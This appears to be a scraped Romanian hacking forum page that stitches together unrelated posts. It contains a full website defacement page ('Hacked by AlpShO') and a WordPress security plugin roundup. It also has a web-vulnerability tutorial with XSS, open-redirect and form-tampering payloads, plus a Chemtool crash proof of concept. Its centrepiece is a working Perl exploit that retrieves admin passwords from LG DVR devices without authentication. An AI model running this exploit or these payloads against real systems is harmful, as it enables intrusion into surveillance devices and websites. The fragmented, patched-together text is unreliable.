Aerosol

WordPress WP EasyCart Unrestricted File Upload WordPress Cross Slide 2.0.5 Cross Site Request Forgery / Cross Site Scripting WordPress Mobile Domain 1.5.2 Cross Site Request Forgery / Cross Site Scripting WordPress Spider Facebook 1.0.10 Cross Site Scripting WordPress Redirection Page 1.2 CSRF / XSS WordPress Google Doc Embedder 2.5.18 Cross Site Scripting WordPress Acobot Live Chat And Contact Form 2.0 CSRF / XSS WordPress Contact Form DB 2.8.26 Cross Site Scripting WordPress Cart66 Lite 1.5.4 Cross Site Scripting WordPress WPLMS 1.8.4.1 Privilege Escalation

<head><script type="text/javascript">var _gaq=_gaq||[];_gaq.push(['_setSiteSpeedSampleRate',100]);</script> <meta charset="utf-8"/> <TITLE>AlpShO A trecut Pe aici ! </TITLE> <br/> <META NAME="description" CONTENT="DJO'R"> <META NAME="keywords" CONTENT="djor"> <META NAME="robot" CONTENT="index,follow"> <META NAME="copyright" CONTENT="Copyright 2014"> <META NAME="author" CONTENT="no-c0de"> <META NAME="language" CONTENT="English"> <META NAME="revisit-after" CONTENT="1"> <link rel="SHORTCUT ICON" href="http://s2.postimg.org/w5btwer7d/defacedex.jpg"> <link href='http://fonts.googleapis.com/css?family=Averia+Sans+Libre' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'> <meta name="Description" content="HACKED by AlpShO "> <center> <style> body {cursor:cross; background: #000000 </style> <style>body{text-align;font-family:'Averia Sans Libre',cursive}hr{border:1px solid #1c1c1c}</style> <style type="text/css">body,td,th{color:#fff}body{cursor:url("http://www.fbvideo.16mb.com/files/cur.cur"),default;background-color:#000}a{text-decoration:none}a:link{color:#0f0}a:visited{color:#0f0}a:hover{color:#0f0}a:active{color:#0f0}.style2{Helvetica, sans-serif;font-weight:bold;font-size:15px}.style3{Helvetica, sans-serif;font-weight:bold}.style4{color:#ff0}.style5{color:red}.style6{color:#0f0}img{border:4px double red;box-shadow:0px 9px 15px white;border-radius:10px}.thanks{border:4px double #fff;box-shadow:0px 2px 20px white;border-radius:10px;padding:9px}.a{text-shadow:0px 1px 10px lime}</style> <meta name="google-site-verification" content=""/> <script type="text/javascript">var _gaq=_gaq||[];_gaq.push(['_setAccount','UA-26650270-1']);_gaq.push(['_setDomainName','www.elite-entertainment.ch']);_gaq.push(['_trackPageview']);(function(){var ga=document.createElement('script');ga.type='text/javascript';ga.async=true;ga.src=('https:'==document.location.protocol?'https://ssl':'http://www')+'.google-analytics.com/ga.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ga,s);})();</script> </head> <body> <center><img src="http://s14.postimg.org/9gogeq3t9/5m_Hbk_Go.jpg?noCache=1420998620" width="" height=""><br/><br/><p></p><font face="Orbitron" size="10" color="white" class="a">Deface by</font> <font face="Orbitron" size="10" color="#FF0000" class="a"> AlpShO</font><br> <span class="a"> WEBSITE: www.www.ro </span><br> <hr/> <span class="a"> <body onload="writetext()"> <script language="JavaScript"> msg = new Array(); msg[0] = "<center><font face='Courier' color='#00FF00' new size='4'><em>></em> <b>Securitatea ta e slaba!</b><br></font></center>"; msg[1] = "<center><font face='Courier' color='#00FF00' new size='4'><em>></em> <b>Hacked by AlpShO</b><br></font></center>"; msg[2] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>EXPECT US!</b><br></font></center>"; msg[3] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>Your base is on my control!</b><br></font></center>"; msg[4] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>Invatati 2 tutoriale si sunteti HACKERI !</b><br></font></center>"; msg[5] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b> Faceti de rusine ROMANIA!</b><br></font></center>"; msg[6] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>Comunity is Down for AlpShO!</b><br></font></center>"; msg[7] = "<center><font face='Courier' color='red' new size='4'><em>></em> <b>Prea Multi Hackeri in lumea asta!</b><br></font></center>"; text1 = "___"; //the same as text2, only the last character is highlighted text2 = ""; //current string, which will be written count = 0; //char index in string text count2 = 0; //number of strings text = msg[0].split(""); //text - string written function writetext() { //show strings above on screen text1 = text2 + "<font color='#FFFFFF'>" + text[count] + "</font>"; text2 += text[count]; document.all["nothing"].innerHTML = text1; //where to write if (count < text.length-1){ count++; setTimeout('writetext()', 25); } else { //if this string is written, get the new string count = 0; if (count2 != 15) { //write 15 strings count2++; text2 += ""; //a new line text = eval('msg['+count2+'].split("")'); //get the new string to text setTimeout('writetext()', 1); } } } </script> <script language="JavaScript"> <!-- Disable function disableselect(e){ return false } function reEnable(){ return true } //if IE4+ document.onselectstart=new Function ("return false") document.oncontextmenu=new Function ("return false") //if NS6 if (window.sidebar){ document.onmousedown=disableselect document.onclick=reEnable } //--> </script> <div id="nothing" style="font-family: 'Courier';"> <h2><u> <center><br> <span style="color: rgb(204, 153, 51);"><br> </span></center> </u></h2> <p><b><br> <font color="#00ff00" face="Courier"> </font></b></p> </div> </center> </td> </tr> <tr> <center><i>+========== Forum-Couner Strike 1.6 ==========+</center></span><br> </div> </center> <center> </iframe></center> <center><i>+========== [ AlpShO ] ==========+</center></span><br> </div> </center> <center><iframe width="1" height="1" src="https://www.youtube.com/v/watch?v=DJ7ZL6ul71k&feature=related&autoplay=1&loop=1" frameborder="0" allowfullscreen></iframe></center> </body> </html><center><div style='border-top:1px solid #666666; height:20px; padding:1px; background: #333333 none repeat scroll 0% 0%; position: fixed; bottom: 0pt; right: 0pt; left: 0pt; width: 100%; z-index: 100; text-align: center; font-size:12pt;'><font size=1 style='color:gray;font-weight:bold;'><center>Copyright @ by <a href='http://wlg.ro/forum/' title='Cs Life Roamania Network™' style='color:gray'>AlpShO </a></font></div></center> <script language=Javascript> <!-- var message=""; /////////////////////////////////// function clickIE() {if (document.all) {(message);return false;}} function clickNS(e) {if (document.layers||(document.getElementById&&!document.all)) { if (e.which==2||e.which==3) {(message);return false;}}} if (document.layers) {document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;} else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} document.oncontextmenu=new Function("return false") // --> Ce e cu indexul asta de rahat, ce e cu copilaria aia Forum-Counter-Strike WTF? + indexul e luat din alte parti ) Tu esti hecar frate?

Nu inteleg ce rost are postul dar vezi ca am auzit toti de inspect element Daca vrei sa te bage cineva in seama fiindca te simti ca un nimic puteai sa zici ca te bagam! @NETGEAR pardon, scuze ca te-am jignit ai folosit paint, habar ai de inspect element! #Cu dedicatie pentru toti "fanii" mei care au grija sa ma sarute in locul ce nu iese soarele de fiecare data cand au sansa. Si inca un citat: "Uite, zbor peste târfe ?i p?rerile lor! " Versuri B.U.G. Mafia - Ti-o Dau La Muie

WordPress is the most popular blogging platform in the world. Millions of websites including various popular blogs are using WordPress as a content publishing platform. So, hackers are also more interested in hacking WordPress based websites. WordPress usually pushes updates to patch all the known vulnerabilities, but third party themes and plugins make WordPress vulnerable. Sometimes hackers also find vulnerabilities in WordPress that allow them to hack the whole server. In the past three months, we have seen 2 major zero-day vulnerabilities and mass hacking of WordPress websites. Thousands of websites were hacked by exploiting these vulnerabilities. There are many past examples in which a single vulnerable plugin led to the hacking of whole web server hosting hundreds of websites. A few days back, we discussed SoakSoak malware which affected 100k websites in very little time by exploiting the vulnerability in a plugin. So, if you are a WordPress user, you must take care of security. You must always keep your WordPress installation updated and secure. In a previous post, I also discussed WPScanner, a tool for scanning a WordPress website and finding vulnerabilities in it. If you are WordPress user, you can use this tool to find vulnerabilities in your website and patch. In this post, I will discuss various security plugins available for WordPress. These security plugins offer a wide range of features to make your WordPress blog secure from known threats. These plugins keep their services updated with security from the latest exploits and threats. If you are really serious about your online business running on WordPress, you must use any of these plugins to make it secure. These are the 7 best security plugins available for WordPress. 1. WordFence WordFence is one of the most popular WordPress security plugins. It keeps on checking your website for malware infection. If scans all the files of your WordPress core, theme and plugins. If it finds any kind of infection, it will notify you. It claims to make your WordPress website 50 times faster and secure. For making your website faster, it uses Falcom caching engine. This plugin is free, but a few advanced features are available for premium users. If you can afford it, do it. This plugin blocks bruteforce attack and can add two factor authentication via SMS. You can also block traffic from a specific country. It also includes a firewall to block fake traffic, botnet and scanners. It also scans your hosting for known backdoors including C99, R57 and others. If it finds anything, you will instantly get email notification. It also scans your posts and comments for malicious code. It also supports multi-site. You can also check the traffic on your WordPress website in real time and see if there is any security threat attacking your website. Download WordFence 2. BulletProof Security BulletProof Security is another popular WordPress security plugin that takes care of various things. It adds firewall security, database security, login security and more. It comes with four-click setup interface. Just activate this plugin and then relax. It will take care of your website. It limits failed login attempts and blocks security scanners, fake traffic, IP blocking and code scanners. It keeps on checking the code of WordPress core files, themes and plugins. In case of any known infection, it notifies admin. It also optimizes the performance of your website by adding caching. It comes with built-in file manager for htaccess. It protects WordPress websites against various vulnerabilities including XSS, RFI, CRLF, CSRF, Base64, Code Injection, SQL Injection and many other. This plugin keeps itself updated with new vulnerabilities to keep your website protected. It keeps on updating it according to new exploits and vulnerabilities. It also has a pro version which offers some advanced features to improve the security of your website. But the free version is popular enough to make your website secure. Download BulletProof Security 3. Sucuri Security Sucuri Security is the security plugin for WordPress. This plugin is from the popular website security and auditing company Sucuri. This plugin offers various security features like security activity auditing, file integrity monitoring, malware scanning, blacklist monitoring, and website firewall. It incorporates various blacklist engines including Google Safe Browsing, Sucuri Labs, Norton, McAfee Site Advisor and more to check your website. If there is anything wrong, it will notify you via email. It protects your website from DOS attack, Zero Day Disclosure Patches, bruteforce attacks and other scanner attacks. It also keeps log of all activities and keep these logs safe in the Sucuri cloud. So, if an attacker is able to bypass the security controls, your security logs will be safe within Sucuri’s security operations center. If you are willing to pay, you can go for the Sucuri premium service. They are a well known web application security company with a team of experts. So, you can get better service and advice. Download Sucuri Security 4. iThemes Security (formerly Better WP Security) iThemes Security is also a nice WordPress security plugin which claims to offer 30+ ways to secure and protect your WordPress website. With one click installation, you can stop automated attacks and protect your website. it also fixes various common security holes in your website. It tracks registered users’ activity and adds two-factor authentication, import/export settings, password expiration, malware scanning, and various other things. It scans the entire website and tries to find if there is any potential vulnerability in your website. It also prevents bruteforce attacks and ban IP addresses which try to bruteforce. It also forces users to use secure passwords and also forces SSL for admin area in server support. Unlike other plugins, the GeoIP banning feature is not available. But the company has promised to bring this feature soon. We cannot say exactly when, but it says the feature is coming soon. It also integrates Google reCAPTCHA to prevent comment spam on your website. Download iThemes security 5. Acunetix WP SecurityScan Acunetix WP Security Scan is the WordPress security plugin by Acunetix. Acunetix is a well known company in web application security. It offers a security scanning tool to find vulnerabilities in web applications. This plugin helps you to secure your WordPress website and suggests measures to improve the security. It offers file permission security, version hiding, admin protection, removing WP generator tag from source, and database security. It removes various information from the source code of the page which can be used in the information gathering process before attack. This includes theme update information, plugin update information, really simple discover meta tag, WordPress version, Windows live write meta tag, error information from login page, versions from scripts, versions from stylesheets, database and php error reporting. It also offers a database backup tool to take a backup of your website. With its live traffic monitor tool, you can check traffic in real time. It also scans your website to notify known web application vulnerabilities. Download Acunetix WP SecurityScan 6. All In One WP Security & Firewall All In One WP Security & Firewall is another popular WordPress security plugin to check vulnerabilities in your WordPress website. This plugin is easy to use and reduces the security risks by adding recommended security practices. It protect against bruteforce login attack and lockdown if someone tries to bruteforce. It also sends you an email notification if somebody gets locked out due to failed login attempts. It detects if a user tries to save a weak password and forces him/her to use a strong password. It also monitors the account activity of all users and keeps track of username, IP and login date time. It also allows you to schedule automatic backup and receive email notification. It also protects PHP code by disabling admin area editing. It adds a web application firewall in your website and enables 5G Blacklist to prevent various attacks. It denies bad query strings, prevent XSS, CSRF, SQL injection, malicious bots and other security threats. It also has a security scanner which keeps track of files and notifies you about each changes in your WordPress system. It can also detect malicious code in your WordPress website. It blocks and protects your blog from comment spam. It also works with most plugins without any problem. Download All In One WP Security & Firewall 7. 6Scan Security 6Scan Security is a popular auto-fix protection for your WordPress site. It can protect your website from hackers. It offers rule-based protection for your website and tries to keep the security of your website up to date. It has a security scanner which scans and protect your website against SQL injection, Cross Site Scripting, CSRF, Directory traversal, Remote file including, DOS attack and other OWASP top ten security vulnerabilities. A notable feature of the plugin is its automatic vulnerability fix. When it finds any vulnerable code, it applies auto-fix by using its auto-fix server-side agent solution. It also has an automatic malware fix for malware related issues on your website. Like other plugins, it also sends email notifications if there is anything serious in your website. Download 6 Scan Security Additional security measures Along with these WordPress plugins, you should also follow a few security measures from your side. These will help you in improving the security of your blog. Always keep your WordPress installation up to date. Update your WordPress as soon as possible if there is any new WordPress update. Most of the times, hacked websites are those which are using an older version of WordPress. Older versions of WordPress always have a few known security issues. And exploits for these security issues are available for free. Even a kid can hack your website if it is running on a vulnerable version of WordPress. Always keep plugins and themes added in your blog updates to latest version. New versions always come with new features and security fixes. So, updating plugins and themes is necessary. Most of the time, these third party plugins and themes are the reason for vulnerability in WordPress websites. Attackers can exploit these plugins to gain access to your website or inject malicious script in your website. Download themes and plugins only from trusted sources. Nulled themes and themes from untrusted sources generally contain malware in the code. If you install any security plugin, you will be notified, but why to take risk. Avoid any unknown source for download plugins and themes. Avoid using the administrator username ‘admin’, because this is default and common. By using this username in your blog, you are making the attacker’s work easier. He does not need to guess the username now, just bruteforce your website for username admin. Thanks to these plugins, bruteforce will not work anymore. Always use strong password for your WordPress account. WordPress bruteforcing tools are available. So, do not take the risk. Use a long password with capital letters, small case letters, numbers and special characters. A combination of these makes a strong password which is hard to guess. Conclusion These are few WordPress security plugins you can use to make your WordPress blog secure. You do not need to download all these plugins. Just try any one and see if it suits you. If you are not happy with its performance, you can download any other plugin to check and use. Every single plugin offers unique security features. You will feel relaxed after having any of these plugins in your website. Malware scanning, exploit scanning and brute force protection are few features which you must have in your website. If you have a good budget and do not want to be in technicalities, you can go for premium versions of the plugins which offer more advanced security features with detail reports. A few plugins also offer free customer support and security assessment with the pro version. With an increasing number of hacking attacks, it is necessary to have security in your website. If you are a WordPress user, what security plugin do you use in your website? Share it with us in the comments. Source

Introduction In this last part of the Website Hacking series, we are going to list 18 common web vulnerabilities and flaws and we are going to briefly provide solutions to them. Some of them are described for the first time in the Website Hacking series and some we have discussed before but in greater depth. 1. Saving all user input If you are using a framework, for example, a PHP framework, you might be tempted to save all user input to your model or database since it has already been validated and escaped. Let us say that you are using CakePHP and have included a registration form using CakePHP’s Form helper. SNIPPET 1 Now, you might be tempted to save all data from CakePHP’s $this->request->data array/method as is if you do not read the docs carefully or view some of the examples provided there (the live blog site). SNIPPET 2 You just save all data and thank the framework creators. However, there are at least two things you did wrong: $this->request->data does not contain escaped/sanitized input, just the input from the superglobals. Firstly, you should use CakePHP’s h() function to prevent people inserting tags in their username: like this h($this->request->data) However, this is not enough and a wrong approach. If you save all user input in your Model (database) the user can add new input tags directly in his browser and try to guess some columns in your users table for which you have not provided an input in the website’s form. For example, many CakePHP’s applications have “role” column set to user/admin or something similar (it is used in the docs as well). The user can just open his Developer Tools, find the registration form or right click and select Inspect Element, click on Edit as HTML and add a new input like this: <input name=”data[user][role]” type=”text”> <input name=” [user][role]” type=”text”> Or whatever the current way for forms to interact with your Models is, guess column names and insert values to them. One way to solve this is to change your column that defines user’s roles and permissions name to something unpredictable. However, that is not the safest approach you can take. You can either insert the data into the database manually, which will ensure no extra columns will be saved: SNIPPET 3 Or alternatively, you could still save all user data but set explicitly the values of columns not found in the form: SNIPPET 4 2. Allowing user access to assets Many sites work with user input and user data and store this data. Clients can see where their assets are stored, so there is no need for them to guess. For example, a client could see that the images he uploaded were stored in /uploads/{username} because the images he uploaded were loaded to the page from that directory, so if he knows some usernames of different people he could just change the directory name to another user and browse through all of his data without having to brute-force directory names. The first way to tackle this issue that we discussed before is not enough (adding Options All –Indexes to the .htaccess file).It would prevent users from browsing directories and opening whatever they want but they would still know the directory exists and they can still guess directory names because the server will return a 403 Forbidden (which shows something exists in that path). Furthermore, they could guess file names from some patterns that the file names follow and open them. Therefore, you need to block access to the files in your uploads directory. If you are storing text files (let us say users can keep notes and view/edit them whenever they want) you could add to your .htaccess the following rule: RewriteEngine On RewriteRule ^uploads/.*.(txt|doc)$ – [F,L,NC] The F flag would return a 403 Forbidden response, the L flag causes the next rules to stop being processed, and the NC eliminates case-sensitivity. Figure 1: The page with only directory listing disabled. Figure 2: The page with only directory listing disabled. You cannot browse directories, but if each user has a notes.txt file, you can easily view user’s notes by knowing only their username. Figure 3: Trying to access the notes with both directory listing and controlled access to files. If you use the rewrite rule to disable users from browsing other users notes, your back-end would still be able to access the notes, show them to users or edit them. For example: SNIPPET 5 Where the $user variable would come from a session in a real-world application. 3. Running basic WordPress installation Common mistakes here are not limiting the login attempts on your wp-admin page. This would allow anyone to brute-force your credentials and destroy your blog/site. This becomes even easier because most people create their master username to be ‘admin’ which involves only brute-forcing the password to get full access to the WP website. Another mistake is that the wp-admin login page is left without a form of CAPTCHA or a protection against bots. This combined with no limitation of login attempts equals certain death of your online presence at some point in the future. You could avoid all 3 of these things and also change the default wp-admin path to be something different as well (obfuscation). 4. Relying too much on IP addresses while having weak bot protection Most ISPs provide dynamic IP addresses, and the IP address you have banned or stored may already be obsolete in less than a day. Furthermore, it is often not very difficult to change your IP address – use a proxy, release it from the router or from the OS, change locations. There are myriad ways to do it. To prevent bots from causing undesired consequences, it would be better to use alternative ways – enhance your CAPTCHAs, add inputs only bots will fill out, require JavaScript/cookies enabled to submit a form, and so on. 5. Improper redirects Let us say that you have a redirect page or a GET value (for simplicity’s sake) that redirects users to another page of your site or to another website. However, if you forget to disallow redirects to third-party websites or in case you allow those, if you do not create a warning page before redirecting that will tell the user where they are going and that they are leaving the site – users can easily abuse your site by giving links that seem to be pointing to your site but will redirect users to malicious websites. if (isset($_GET['redirect'])) { header("Location: " . $_GET['redirect']); } If we have something as simple as this, then users can easily get fooled to enter bad sites by following an URL like this: http://localhost:8079/articles/Website%20Hacking%20Part%20VII/?redirect=http://www.somemalicioussitehere.com 6. Cross Site Request Forgery If your site allows users to add comments/posts and insert tags such as <img> and load a third-party image, they can provide a link that is not an image but will fool the clients’ browsers (the users that will be reading them) to load the resource and perform an action on a website if they are authenticated in it. For example, if Facebook was sufficed with a couple of GET parameters or a particular URL to follow someone/something on their network, we could have added an image like that: my image And if the user is currently logged in he would have followed an arbitrary person. Of course, this would not work in this particular situation. 7. Insecure file handling A common mistake is to trust that a file does not contain something inappropriate. Code can be disguised as an image, so checking the file extension is not enough. At the very least, the MIME type should also be checked. Also, ASCII / text files should be escaped. Here is an example of such a vulnerability: SNIPPET 6 The vulnerability arises when at some point we display the contents of the .txt file in our page: SNIPPET 7 If the file we submit contains the following code: <script> alert(document.cookie); </script> Then all user cookies for that website will be shown in an alert. 8. Displaying and trusting HTTP headers These can be modified by users and can be malicious. For example, if you display the client’s User-Agent header, it might be changed to consist of code which would then be executed in your back-end. This is also valid for the referrer header, so it should not be used to determine whether the user can access a particular page by itself (for example, checking if the referfer is the login page and assuming the user has logged in successfully since he was redirected to the members area’s index page from the login page). 9. Information disclosure Your live apps should not be in debug mode. Errors should not be shown. 10. Directory traversal If you are using some parameter that opens different files on your website based on user input, your back-end should escape special characters such as the . (dot) or / (slash) from the input and preferably use whitelisting. 11. Using HTTP for semi-confidential data A common flaw is using HTTP for sites that include mechanisms such as registration/login. Even widely used online marketplaces in Bulgaria use simple HTTP (such as OLX.bg - ???? ?? ????????? ????? ). Using HTTP makes it easy for potential attackers in your network to sniff your traffic and get your credentials with no real efforts. For example, if you login to olx while in a Wi-Fi, you are subject to risk. 13. Sessions can be stolen Sessions can be stolen, making the attacker login as someone else. There are multiple vectors of defense here – such as checking the IP address, the user agent, and regenerating session, and adding cookies. 14. Be careful which third-party libraries, CDNs and plugins you use They might be simply outdated, opening a wide variety of security holes, or they might be malicious – giving access to the shady library’s creator to your server. 15. Bots are everywhere Take care of malicious bots not by banning their IP but by enhancing CAPTCHA, adding hidden form fields that users would not fill, and requiring JavaScript or cookies enabled to submit a form. 16. Use HTTP only cookies This would reduce the impact of some other attacks – such as XSS 17. Hashing Hash your passwords and try to avoid md5 or sha-1 algorithms (https://community.qualys.com/blogs/securitylabs/2014/09/09/sha1-deprecation-what-you-need-to-know, hash - Why does some popular software still use md5? - Information Security Stack Exchange ). Use salts to prevent attacks with rainbow tables. 18. XSS Always escape input unless you really, really trust the source (admin panel). You can either remove tags or display them as entities depending on your needs. | PHP: strip_tags($input, $allowedTags); htmlspecialchars($input, ENT_QUOTES); htmlentities($input); | 19. SQL Injection Use prepared statements or do not perform a query which is not hardcoded without sanitizing it (PHP: PDO class or sanitize with mysqli_real_escape_string($conn, $str) if using mysqli. Do not use mysql_*). Conclusion This was the last part of the Website Hacking series. We have introduced some new vulnerabilities and briefly discussed them and have summarized our points for everything that we have talked about so far. We hope that now you will feel more confident when deploying your web apps by putting these strategies in use. Source

------------------ ------------------- ||| Exploit-Sources(Part One) ||| ||| MINDZSEC ||| ||| Contact:flor_iano@hotmail.com ||| ||| ||| ------------------ ------------------- [Introduction] This paper is about sources to make hacking done and different exploits by others.Here i have collected the most used sources to conduct a [Penetration Test][Hacking][Exploit Development] [Forensics][Stack Smashing].Here we go with sources. Read more here: Exploit-Sources (Part One)

#!/usr/bin/perl # # LG DVR LE6016D unauthenticated remote # users/passwords disclosure exploit # # # Copyright 2015 (c) Todor Donev # <todor.donev at gmail.com> # http://www.ethical-hacker.org/ #### # # Digital video recorder (DVR) surveillance is the use of cameras, # often hidden or concealed, that use DVR technology to record # video for playback or immediate viewing. As technological # innovations have made improvements in the security and # surveillance industry, DVR surveillance has become more # prominent and allows for easier and more versatile security # systems in homes and businesses. A DVR surveillance security # system can be designed for indoor use or outdoor use and can # often involve hidden security cameras, concealed “nanny cams” # for home security, and even personal recording devices hidden # on a person. # #### # # Description: # No authentication (login) is required to exploit this vulnerability. # This program demonstrates how unpatched security bug would enable # hackers to gain control of a vulnerable device while sitting # behind their keyboard, potentially thousands of miles away. # An unauthenticated attacker that is connected to the DVR's may be # able to retrieve the device's administrator password allowing them # to directly access the device's configuration control panel. # #### # # Disclaimer: # This or previous programs is for Educational purpose ONLY. Do not # use it without permission.The usual disclaimer applies, especially # the fact that Todor Donev is not liable for any damages caused by # direct or indirect use of the information or functionality provided # by these programs. The author or any Internet provider bears NO # responsibility for content or misuse of these programs or any # derivatives thereof. By using these programs you accept the fact # that any damage (dataloss, system crash, system compromise, etc.) # caused by the use of these programs is not Todor Donev's # responsibility. # #### # Use them at your own risk! #### # # $ perl lg.pl 133.7.133.7:80 # LG DVR LE6016D unauthenticated remote # users/passwords disclosure exploit # u/p: admin/000000 # u/p: user1/000000 # u/p: user2/000000 # u/p: user3/000000 # u/p: LOGOUT/000000 # Copyright 2015 (c) Todor Donev # <todor.donev at gmail.com> # http://www.ethical-hacker.org/ # #### use LWP::Simple; print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n"; if (@ARGV == 0) {&usg; &foot;} while (@ARGV > 0) { $t = shift(@ARGV); } my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!"); for (my $i=0; $i <= 4; $i++){ if ($r =~ m/<name>(.*)<\/name>/g){ print " u\/p: $1\/"; } if ($r =~ m/<pw>(.*)<\/pw>/g){ print "$1\n"; } } &foot; sub usg(){ print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n"; } sub foot(){ print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n"; print " http://www.ethical-hacker.org/\n"; exit; } Source

Document Title: =============== Chemtool 1.6.14 Memory Corruption Vulnerability Date: ============= 08/02/2015 Vendor Homepage: ================ http://ruby.chemie.uni-freiburg.de/~martin/chemtool/ Abstract Advisory Information: ============================== Memory Corruption Vulnerability on Chemtool 1.6.14. Affected Product(s): ==================== Chemtool 1.6.14 or older Exploitation Technique: ======================= Local Severity Level: =============== Medium Technical Details & Description: ================================ A Memory Corruption Vulnerability is detected on Chemtool 1.6.14. An attacker can crash the software by using an input file. Also, an attacker can crash the software by entering a filename too long. b77a8000-b77a9000 r--s 00000000 08:01 152558 /var/cache/fontconfig/3fe29f0c9fa221c8ee16555d4835b3ab-le32d4.cache-4 b77a9000-b77aa000 r--s 00000000 00:15 209651 /run/user/1000/dconf/user b77aa000-b77bb000 r-xp 00000000 08:01 393480 /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so b77bb000-b77bc000 r--p 00010000 08:01 393480 /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so b77bc000-b77bd000 rw-p 00011000 08:01 393480 /usr/lib/i386-linux-gnu/gtk-2.0/modules/liboverlay-scrollbar.so b77bd000-b77be000 rwxp 00000000 00:00 0 b77be000-b77bf000 r--p 00855000 08:01 274691 /usr/lib/locale/locale-archive b77bf000-b77c0000 r--p 00596000 08:01 274691 /usr/lib/locale/locale-archive b77c0000-b77c2000 rw-p 00000000 00:00 0 b77c2000-b77c3000 r-xp 00000000 00:00 0 [vdso] b77c3000-b77e3000 r-xp 00000000 08:01 132074 /lib/i386-linux-gnu/ ld-2.19.so b77e3000-b77e4000 r--p 0001f000 08:01 132074 /lib/i386-linux-gnu/ ld-2.19.so b77e4000-b77e5000 rw-p 00020000 08:01 132074 /lib/i386-linux-gnu/ ld-2.19.so bfeff000-bff21000 rw-p 00000000 00:00 0 [stack] Aborted (core dumped) Proof of Concept (PoC): ======================= This vulnerabilities can be exploited by local attackers with userinteraction. First test. Attacker can generate a malicious file (format .png).This file can produced a Stack Smashing. #/usr/bin/ruby buf = "a"*3000 filename = "crash.png" file = open(filename,'w') file.write(buf) file.close puts "file created!" Second test. Attacker can enter a filename too long. For example, this program needs recieve a parameter. If this parameter is too long, It will crash. $chemtool $(perl -e 'print "A"x900') How to perform: ======================= 1) You can test it with gdb. You attach this application. 2) Run it, now, you can move "crash.png" file that we generated by our ruby script to the application. Also, you can run argv[1] with a long value. When you perform above steps so application will crash. Analyze it on gdb. Solution - Fix & Patch: ======================= Restrict working maximum size. I believe that this bug doesn't have solution. Security Risk: ============== The security risk of the vulnerability is estimated as medium because of the local crash method. Authors: ================== Pablo González Source

https://rstforums.com/forum/96303-salu.rst E al 3-lea cont ( 2 sunt deja banate) On:// Bine ai venit! @YloveK vezi frate ca ai semnatura aia gigantica.. poti scrie mic ca vedem nu suntem orbi!

@Aerosol 1% ala am o relatie de 3 ani de zile (cu o fata) deci nu, nu imi plac fetele , si am vazut ca multi a postat conturi , eu nu pot posta ? Ha ha ha tocmai ai zis ca nu iti plac fetele ))) Stai linistit noi nu te judecam! Off:// Grea limba romana!

When Microsoft introduced use-after-free mitigations into Internet Explorer last summer, certain classes of exploits were closed off, and researchers and black hats were left to chase new ways to corrupt memory inside the browser. A team of experts from HP’s Zero Day Initiative were among those who noticed that once-reliable exploits were no longer behaving as expected, and traced it back to a number of mitigations silently introduced in July into IE. By October, researchers Brian Gorenc, AbdulAziz Hariri, and Simon Zuckerbraun had developed attacks against two mitigations, Isolated Heap and MemoryProtection, and today announced they’d been awarded $125,000 from the Microsoft Mitigation Bypass Bounty and Blue Hat Bonus for Defense. A chunk of that total, $25,000, was awarded separately for a submission suggesting a defense against the technique they submitted. The researchers said they will donate the full bounty to Texas A&M University, Concordia University, and Khan Academy, three institutions that sponsor strong STEM (science, technology, engineering and mathematics) programs. “We were very excited when we heard the results from Microsoft,” Gorenc, ZDI lead researcher, said. “We put a lot of time and effort into that research. We’re glad to hear Microsoft got good data out of it.” Gorenc said Microsoft has not patched the issues identified in the HP ZDI research, and as a result, Gorenc said ZDI will not disclose details yet. He did tell Threatpost that part of the attack includes using MemoryProtect as an oracle to bypass Address Space Layout Randomization (ASLR). “We use one mitigation to defeat another,” he said. “Stuff like this has been done in the past, but what’s interesting about this one is that these mitigations were designed to make use-after-free harder on the attacker, but what we’ve done is made it defeat another mitigation that IE relies on; it weakens it in that perspective. It was interesting to see one used against another.” Use-after-free vulnerabilities have overtaken buffer overflows as the hot new memory-corruption vulnerability. They happen when memory allocated to a pointer has been freed, allowing attackers to use that pointer against another area in memory where malicious code has been inserted and will be executed. Microsoft, for its part, has invested money and time into building mitigations against memory-related attacks, not only with the inclusion of mitigations in Internet Explorer, but also through its Enhanced Mitigation Experience Toolkit (EMET). For the most part, bypasses of and attacks against mitigations have largely been confined to researchers and academics, but some high-profile targeted attacks that have been outed do take into consideration the presence of these mitigations. Operation Snowman, for example, an APT operation against military and government targets, scanned for the presence of EMET and would not execute if the tool was detected. Internet Explorer has been plagued by memory corruption bugs forever it seems, with Microsoft releasing almost monthly cumulative updates for the browser which is constantly being used in targeted attacks and has been easy pickings for hackers. “The attack surface is valuable and has to exist,” Gorenc said of IE and use-after-free bugs. “It’s an attack surface where with slight manipulations, you can gain code execution on the browser.” ZDI, Gorenc said, has spent the majority of its money on the use-after-free attack surface; ZDI is a vulnerability program that rewards researchers who disclose vulnerabilities through its process. The bugs are shared with HP customers first and then with the affected vendors. ZDI said it has spent $12 million dollars over the past nine years buying vulnerabilities. Gorenc’s colleagues Zuckerbraun and Hariri were external contributors before joining ZDI full time; both spent a lot of time on IE and use-after-free submissions, HP said. For these attacks, Zuckerbraun reverse engineered MemProtect, studying how it stymied use-after-free vulnerabilities. Hariri focused on bypassing Isolated Heap. Together with Gorenc’s work on sandbox bypasses, the researchers soon had enough research to share with Microsoft. The reward, meanwhile, will be donated to the three education institutions, each of which have personal meaning to the respective researchers and their focus on STEM. “HP Security Research donates to organizations that have a strong STEM emphasis. We decided we would select organizations and charities to receive the money we won that support that emphasis,” Gorenc said. “We look at it as a way to give back. Hopefully our research has made our environment better, hardened IE, and helps fund a strong engineering organization.” Source

